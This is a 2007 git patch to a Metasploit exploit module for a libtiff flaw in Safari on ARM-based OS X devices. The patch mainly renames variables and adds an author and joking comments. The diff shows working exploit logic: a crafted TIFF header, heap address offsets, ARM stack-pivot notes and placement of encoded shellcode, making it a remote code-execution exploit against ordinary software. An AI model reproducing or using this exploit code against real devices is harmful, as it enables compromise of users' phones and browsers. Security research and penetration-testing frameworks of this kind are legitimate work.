From d3c96f0b4501d5dee2e3a58282f89ba742aedf89 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Tue, 16 Oct 2007 05:40:36 +0000
Subject: [PATCH] hehe-ified.

git-svn-id: file:///home/svn/framework3/trunk@5149 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/exploits/osx/armle/safari_libtiff.rb | 27 +++++++++-----------
 1 file changed, 12 insertions(+), 15 deletions(-)

diff --git a/modules/exploits/osx/armle/safari_libtiff.rb b/modules/exploits/osx/armle/safari_libtiff.rb
index 6fea291f68..eafa05bd71 100644
--- a/modules/exploits/osx/armle/safari_libtiff.rb
+++ b/modules/exploits/osx/armle/safari_libtiff.rb
@@ -31,7 +31,7 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
 			tools installed will need to use a special payload.
 			},
 			'License'        => MSF_LICENSE,
-			'Author'         =>  ['hdm'],
+			'Author'         =>  ['hdm', 'Kevin Finisterre <kf[at]digitalmunition.com>'],
 			'Version'        => '$Revision$',
 			'References'     => 
 				[
@@ -102,8 +102,8 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
 		#  - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday
 		#
 		
-		dlen = 0x1000
-		data =	
+		lolz = 0x1000
+		tiff =	
 			"\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+
 			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
 			"\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+
@@ -114,26 +114,24 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
 			"\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+
 			"\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+
 			"\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+
-			[dlen].pack("V") +
+			[lolz].pack("V") +
 			"\x84\x00\x00\x00\x00\x00\x00\x00"
-		
-
 
 		# Randomize the bajeezus out of our data
-		patt = rand_text(dlen)
+		hehe = rand_text(lolz)
 		
 		# Were going to candy mountain!
-		patt[120, 4] = [target['Magic']].pack("V")
+		hehe[120, 4] = [target['Magic']].pack("V")
 
 		# >> add r0, r4, #0x30
-		patt[104, 4] = [ targ['Heap'] - 0x30 ].pack("V")
+		hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack("V")
 
 		# Candy mountain, Charlie!
 		# >> mov r1, sp
 
 		# It will be an adventure!
 		# >> mov r2, r8
-		patt[ 92, 4] = [ patt.length ].pack("V")
+		hehe[ 92, 4] = [ hehe.length ].pack("V")
 
 		# Its a magic leoplurodon!
 		# It has spoken!
@@ -158,7 +156,7 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
 		# We made it to candy mountain!
 		# Go inside Charlie!
 		# sub sp, r7, #0x14		
-		patt[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V")
+		hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V")
 
 		# Goodbye Charlie!
 		# ;; targ['Heap'] + 0x48 becomes the stack pointer
@@ -168,13 +166,12 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
 		# >> ldmia sp!, {r4, r5, r6, r7, pc}
 		
 		# Return back to the copied heap data
-		patt[192, 4] = [  targ['Heap'] + 196  ].pack("V")
+		hehe[192, 4] = [  targ['Heap'] + 196  ].pack("V")
 		
 		# Insert our actual shellcode at heap location + 196
-		patt[196, payload.encoded.length] = payload.encoded
+		hehe[196, payload.encoded.length] = payload.encoded
 
-		data << patt
-		data
+		tiff << hehe
 	end
 	
 end